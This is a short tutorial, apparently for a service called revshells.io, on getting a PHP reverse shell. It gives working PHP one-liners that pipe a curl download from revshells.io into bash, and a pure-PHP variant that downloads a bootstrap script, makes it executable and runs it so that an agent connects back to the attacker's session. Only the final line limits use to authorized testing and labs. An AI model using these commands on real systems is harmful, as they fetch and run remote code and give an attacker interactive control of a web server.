PHP reverse shell with revshells.io

Classic PHP reverse shells often embed a hard-coded attacker IP and a raw TCP socket. revshells.io replaces that with an HTTPS callback: your PHP code only needs to fetch and execute the session bootstrap once.

1. Create a session

From revshells.io, create a session and copy your session ID.

2. Invoke the bootstrap from PHP

If shell_exec / exec / passthru are allowed and curl exists on the host:

passthru('curl -fsSL https://revshells.io/SESSION-ID/revshell | bash');

Prefer no-PTY when running from a web request (short-lived, no TTY):

passthru('curl -fsSL https://revshells.io/SESSION-ID/nopty | bash');

3. Pure PHP fetch (no shell functions)

When only HTTP wrappers work, pull the bootstrap script and pipe through /bin/sh if permitted:

$script = file_get_contents('https://revshells.io/SESSION-ID/revshell');
$tmp = tempnam(sys_get_temp_dir(), 'rs');
file_put_contents($tmp, $script);
chmod($tmp, 0755);
exec($tmp);

The bootstrap is a shell script that downloads rs-agent and connects back to your session.

4. Operate the callback

Watch the session page on revshells.io for the beacon to connect, then use the built-in terminal or rsctl attach.

For authorized security testing, CTFs, and lab environments only.